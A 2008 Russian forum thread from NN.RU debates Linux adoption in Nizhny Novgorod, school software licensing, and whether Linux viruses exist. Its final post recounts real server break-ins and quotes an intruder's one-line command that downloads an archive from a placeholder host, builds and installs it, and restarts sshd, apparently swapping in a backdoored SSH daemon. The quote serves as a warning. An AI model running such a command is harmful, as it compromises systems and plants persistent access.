--}}
Новая тема
Вы не можете создавать новые темы.
Т.к. вы неавторизованы на сайте. Пожалуйста назовите себя или зарегистрируйтесь.
Список тем

Linux в Нижнем Новгороде

5
31
С друзьями на NN.RU
В социальных сетях
Поделиться
devlabnn
02.02.2008
Добрый день!
Microsoft монополист в сфере программного обеспечения...Есть ли альтернативы Microsoft в Нижнем Новгороде, является ли Linux выходом из сложившейся ситуации на рынке?
Я нарыл интересный сайт о Linux в Нижнем Новгороде....Linux миф или реальность?
Linuxnn.com
1020
02.02.2008
я тоже нарыл интересный сайт ))
ftp://linuxarchive.nnov.ru
Вот, например, пробую переходить работать под Linux (Debian, linux.unn.ru ). И все равно приходится регулярно (раз в неделю) грузить винду, ибо весь окружающий мир подсел на винду:

* что куда послать - требуют документ Word - Open Office не катит по нескольким причинам: во-первых, Word глючит при открытии файлов, созданных Open Office, во-вторых, требуют шрифт Times New Roman, а ставить mstcorefonts влом

* недавно требовали с сотрудников заполнить форму при помощи access

* половина коллег программирует на MS Visual Studio 2005 - под eclipse не пересадишь, а QT под это дело - покупать надо

* окружающий мир делает печатные платы по файлам, созданным в P-CAD, KiCAD не очень жалуют

* Что-то начертить - не могу найти альтернативу Компасу - а он в Linux запускается весьма проблематично (результат зависит от версии wine, а хочется пользоваться штатным из дистрибутива)

Но поскольку за винду надо денежку платить, то для кого Linux - миф, а для кого - суровая реальность, которая постепенно становится родной
Alex5252
02.02.2008
Ссылки на скачивание Linux есть тут:
www.opensoft.nnov.ru/ixnn
Saul
02.02.2008
Фу какой пеар :) Позорят благое дело
vortex
02.02.2008
+1 Голимая реклама сайта. Еще и безграмотного.

Убило там: "Компанией .... осуществлен проект "Корпаративый Linux".
ппц
mih
02.02.2008
Что винды, что линух это инструмент. Хочешь используй один, хочешь другой. Всё зависит от задач. А когда люди пишут фразы типа "выход из сложившейся ситуации на рынке" я могу сказать тока одно "пи.деть не мешки ворочать".
Сорри за слог.
FreeCat
03.02.2008
Уже сделали Linux для школ))) .. я себе образы скачал по случаю(пока был в Мск на анлиме)).
mariner
08.02.2008
Linux в школах будет внедрен еще эх как не скоро. По национальному проекту образование выделены деньги на покупку лиц софта. Первые комплекты из 56 дисков cd и dvd уже поступают в школу. Среди них в основном продукция Microsoft и все ессно под платформу Windows. Вот краткий перечень того что помню:
Windows XP SP2
Windows Vista Business
MS Office 2003, 2007
MS Visual Studio 2005 + MSDN
Borland Developer Studio 2006
Corel X3
Adobe Creative Suite
Kaspersky
1 C,
если интересно могу выложить полный список (скан)
так что увы и ах, сам ждал что наконец то линукс по школам пойдет, но коварный мелкософт всех опередил :-(
Saul
08.02.2008
56 дисков в каждую школу или на всех? :)
mariner
08.02.2008
56 дисков в кажду школу, даже ключи усб к 1С поставляются ... Представляете сколько бабла можно было сэкономить переведи всех на линух
Saul
08.02.2008
Ну, бабло в России исторически считается только в своем кармане :) А казна - она безразмерная, пока нефть текёт.

А можно правда посмотреть весь список?
mariner
08.02.2008
mariner
08.02.2008
Linux в школах будет наиболее активно внедряться в 2009-2011годах, а к 2013 году все школы страны уже должны быть полностью оснащены СПО.

Пакет "Первая ПОмощь" предназначен для использования в школах до внедрения linux. Сроки действия лицензий на эти программы - до 2009-2011гг, в зависимости от программы. Государство потратило на пакеты в десятки раз меньше их реальной стоимость - программа спец. лицензированя, к тому же очень ограниченно все это дело.
Windows XP SP2

Сп3

Windows Vista Business

убивать

MS Office 2003, 2007

несовместимо

Corel X3

Х4

Adobe Creative Suite

Либо корел, либо Фотошоп. Зачем машине 2 двигателя?

Kaspersky

стрелять гнилыми ананасами.

ПыСы: Мы тут на полгода затянули закупку Акада... долго ругали поставщика. А вчерась приехал апдейт до 2008й версии, да еще с двухтомным русским мануалом. Пришлость похвалить поставщика за нерасторопность :о)))
Sanych
03.02.2008
о! можно тож попЕарюсь :) linuxtech.ru :P
Idol
03.02.2008
Хмм... Linux в Нижнем есть )

Есть фирмы которые занимаются переводом фирм на Linux.
Одну я очень хорошо знаю, другие не очень.

если интересно - в приват, дабы рекламу не делать.
ivl77
04.07.2008
Здравствуйте, Idol!
Если можно телефоны, сайт, плиз, очень интересно.
Сколько такое удовольствие может стоить?
Здравствуйте! По вопросам использования Linux в организациях можно обращаться ко мне. Информация в моём портрете, также пишите: makarov@el-sys.org, звоните +7-951-917-84-99
Вы пишете очень абстрактно.

Довольно часто Linux-решения для компании являются большим преимуществом, поскольку позволяют вам очень сильно экономить на ПО, а также избавлять вас от многих проблем, связанных с безопасностью (в том числе с вирусами)

Многое зависит от выполняемых вами задач. К сожалению, на данный момент Linux-системы не способны охватить полностью весь спектр, но существует множество ситуаций, когда Linux-решения вполне подходят, но не применяются под разными (как правило, мнимыми) предлогами.
FreeCat
04.07.2008
Алексей Макаров писал(а)
а также избавлять вас от многих проблем, связанных с безопасностью (в том числе с вирусами)

Не вводите в заблуждение). Вирусы и трои под Linux есть!
Последнее сообщение о реально более-менее опасном вирусе для Linux я видел в 2003м году, а до этого два раза в 2001м. Эти вирусы уже очень давно неработоспособны! За всю историю Linux не было ни одной вирусной эпидемии.
Всего вирусов было написано около сотни, большинство из которых нужно было скомпилировать и целенаправленно запустить (Это равносильно осознанному форматированию HDD).

Повторюсь: Опасных вирусов существовало не более двух десятков. Большинство из них - более пяти лет назад. Сейчас эти вирусы не активны и не опасны. За последние три года не видел ни единого случая заражения Linux-машины вирусом.
Вот интересная ссылка по теме:
ru.wikipedia.org/wiki/%D0%A1...0%BE%D0%B4_Linu

Посмотрите на описания вирусов - почти все были описаны в 2000-2002 годах, созданы намного раньше. Сами по себе эти вирусы были не опасны. Сомневаюсь, что хотя бы один из них будет работать на современном Linux-дистрибутиве (Даже двухгодичной давности).
Вирь под линь? бугага :))) да они и раньше не работали. Ругались на отсутствие правофф и делали себе сепуку :))) один помню был - жеееесть! с большим трудом его ради прикола установили (!) обходя кучу всего на виртуалке, под рутом, все путем, так он бедный плакался плакался, что чего-то ему там не хватает, да так и помер нищасный :))) в работе я его не видела :)))

Вирусы под линух. Не смешите :) они вполне соответствуют бояну "как распространяются вирусы под линухом? а вот как: это чей-то у тебя? вирь под линух? дай позырить" :)))
rh9
04.07.2008
насчет вирусов и троянов можно говорить что их нет поскольку для их работы (это несчитая что все linuxксы так сильно отличаются друг от друга что для нормальной работы их придется компилировать не только под разные платформы от спарков до мипсов но и под разные дистрибьютивы) их надо запускать под рутом и обходить различные системы безопасности SeLinux Iptables Portsentry и др
rh9
04.07.2008
я тоже не видел и не слышал ниодного случая заражения linux вирусом
+ мильен.
FreeCat писал(а)
Не вводите в заблуждение). Вирусы и трои под Linux есть!

Страшная сказка вантузятников :))) которые рассказывают ее на ночь малентким вантузятам :)))
1020
08.07.2008
покажы мне хоть один вирь для linux? :))
Alex5252
08.07.2008
Такое ощущение, что дети собрались, - не стоит недооценивать возможности взлома того или иного сервиса.
Под Linux вирусов, как таковых не видел, т.к. не мониторил размеры и контрольные суммы измененных исполняемых файлов и не могу сказать точно, что не было.
Под линукс очень распространена подмена бинарников.
Примеры:
1. asplinux 11 - не был обновлен apache перед выпуском его в сеть, и злоумышленники, через какую-то уязвимость, установили софт для рассылки спама.
2. debian 3 - одмин, при установке установил для рута простейший пароль,- типа 12345. в результате, в тот же день был заход по ssh и выполнена строка вида:
wget http://site/ssh.gz;tar -zxf ssh.gz;cd ssh; make; make install; killall sshd; sshd ;rm -f ssh.gz также чистилась история...
соответственно по логам скачивания этого файла с хостинга злоумышленник мог узнать адрес взломанного хоста.

В первом случае софт был удален, хост закрыт фаерволом, т.к. не продакшн.
Во втором случае система была уничтожена и переустановлена заново, дабы не искать что еще было установлено или подменено.

Нельзя на 100% сказать, что система чиста, а несанкционированный доступ отсутствует.
Новая тема